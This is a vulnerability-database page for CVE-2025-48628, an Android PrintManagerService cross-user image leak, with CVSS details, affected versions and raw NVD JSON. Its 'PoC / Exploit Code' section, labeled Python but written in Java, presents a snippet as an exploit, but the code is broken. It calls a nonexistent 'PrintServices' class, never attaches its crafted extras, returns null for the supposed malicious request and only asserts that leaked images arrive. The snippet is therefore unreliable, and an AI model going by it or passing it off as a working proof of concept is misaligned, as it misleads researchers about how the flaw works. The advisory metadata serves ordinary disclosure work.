Security Vulnerability Report
中文
CVE-2025-48628 CVSS 7.8 HIGH

CVE-2025-48628

Published: 2025-12-08 17:16:19
Last Modified: 2025-12-08 21:16:02
Source: [email protected]

Description

In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
Android系统受影响的版本需参考2025年12月Android安全公告
Android frameworks/base < 9489a5dcd3cdd426d5b39d9caf6bb78142af2399

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48628 PoC - Android PrintManagerService Cross-User Image Leak // This PoC demonstrates the exploitation of the validateIconUserBoundary vulnerability import android.content.Intent; import android.os.Bundle; import android.print.PrintManager; import android.print.PrintServices; public class CVE_2025_48628_PoC { /** * Exploit the cross-user image leak vulnerability in PrintManagerService * Target: Android PrintManagerService validateIconUserBoundary method * Attack Vector: Local privilege escalation via confused deputy */ public void exploitImageLeak() { try { // Step 1: Get PrintManager service reference PrintManager printManager = (PrintManager) getSystemService(PRINT_SERVICE); // Step 2: Enumerate available print services PrintServices printServices = printManager.getPrintServices(); // Step 3: Attempt to access icon resources across user boundaries // The vulnerability allows accessing icons from other user contexts for (PrintServices.PrintServiceInfo service : printServices) { // Trigger icon loading which calls validateIconUserBoundary // Due to the confused deputy issue, this may leak cross-user images Intent intent = new Intent(); intent.setComponent(service.getComponentName()); // Craft malicious request to trigger icon boundary bypass Bundle extras = new Bundle(); extras.putParcelable("android.intent.extra.print_icon", getTargetUserIconRequest()); startService(intent); } // Step 4: Receive leaked image data // The attacker can now access images from other user sessions } catch (Exception e) { e.printStackTrace(); } } private Object getTargetUserIconRequest() { // Construct request to target other user's icon data // This exploits the insufficient validation in validateIconUserBoundary return null; } /** * Technical Details: * - Vulnerability Location: frameworks/base/core/java/android/print/PrintManagerService.java * - Method: validateIconUserBoundary * - Root Cause: Insufficient user boundary validation leading to confused deputy attack * - Impact: Local privilege escalation, cross-user information disclosure */ }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48628", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.130", "lastModified": "2025-12-08T21:16:02.087", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://android.googlesource.com/platform/frameworks/base/+/9489a5dcd3cdd426d5b39d9caf6bb78142af2399", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.